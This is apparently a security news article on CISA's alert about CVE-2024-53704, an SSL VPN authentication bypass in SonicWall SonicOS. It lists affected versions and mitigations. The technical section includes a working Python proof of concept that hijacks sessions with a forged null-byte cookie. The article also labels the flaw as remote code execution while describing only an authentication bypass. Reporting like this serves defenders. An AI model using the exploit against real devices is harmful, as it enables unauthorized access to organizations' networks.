The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has issued an urgent alert regarding the active exploitation of critical remote code execution (RCE) vulnerability in SonicWall’s SonicOS, tracked as CVE-2024-53704.
Added to CISA’s Known Exploited Vulnerabilities (KEV) catalog on February 19, 2025, the flaw enables unauthenticated attackers to hijack SSL VPN sessions and bypass authentication mechanisms entirely.
Federal agencies have until March 11, 2025, to remediate the vulnerability under Binding Operational Directive (BOD) 22-01.
Private-sector organizations, particularly in healthcare, finance, and critical infrastructure, are urged to prioritize patching due to the exploit’s low complexity and stealthy attack vector.
Technical Analysis of the Authentication Bypass
The vulnerability resides in SonicOS’s handling of SSL VPN session cookies via the getSslvpnSessionFromCookie function.
As per a report by Cyber Security News, Researchers at BishopFox discovered that the system improperly processes Base64-encoded cookies containing null bytes, allowing attackers to forge valid session identifiers.
By crafting a malicious payload of 32 null characters, encoded as a Base64 string and injected via the swap cookie, adversaries can hijack active VPN sessions without credentials.
A proof-of-concept Python script demonstrates the exploit’s simplicity:
import base64, requests, urllib3, warnings
warnings.filterwarnings("ignore", category=urllib3.exceptions.InsecureRequestWarning)
payload = base64.b64encode(b"\x00" * 32).decode()
resp = requests.get(
"https://192.168.50.189:4433/cgi-bin/sslvpnclient?launchplatform=",
cookies={"swap": payload},
verify=False
)
print(resp.headers)
print(resp.text)This script generates a malformed cookie that triggers the authentication bypass, granting attackers unrestricted access to VPN tunnels.
The flaw’s CVSSv3 score of 9.8 reflects its critical severity, compounded by the lack of required privileges and ease of exploitation.
Affected Products and Mitigation Strategies
CVE-2024-53704 impacts the following SonicOS versions:
- SonicOS 7.1.x (versions prior to 7.1.1-7058)
- SonicOS 7.1.2-7019
- SonicOS 8.0.0-8035
SonicWall has released firmware updates for Gen5–Gen7 firewalls, urging immediate deployment. Organizations unable to patch immediately should implement these mitigations:
- Restrict SSL VPN access to trusted IP ranges via firewall rules.
- Disable internet-facing management interfaces to reduce exposure.
- Enforce multi-factor authentication (MFA) for all VPN users, eliminating reliance on single-factor credentials.
With over 500,000 global customers, including government agencies, SonicWall’s widespread adoption magnifies the vulnerability’s risk profile.
Federal agencies face mandatory remediation under CISA’s directive, but private-sector entities remain equally vulnerable.
The exploit’s ability to bypass authentication undetected complicates the incident response, as attackers gain persistent access without triggering traditional security alerts.
CISA’s warning underscores the escalating sophistication of attacks targeting network appliances.
As threat actors pivot from software to hardware vulnerabilities, proactive firmware management and layered authentication defenses are critical to mitigating modern cyber risks.
Free Webinar: Better SOC with Interactive Malware Sandbox for Incident Response, and Threat Hunting - Register Here
 vulnerability in SonicWall’s SonicOS, tracked as CVE-2024-53704.){kind=link}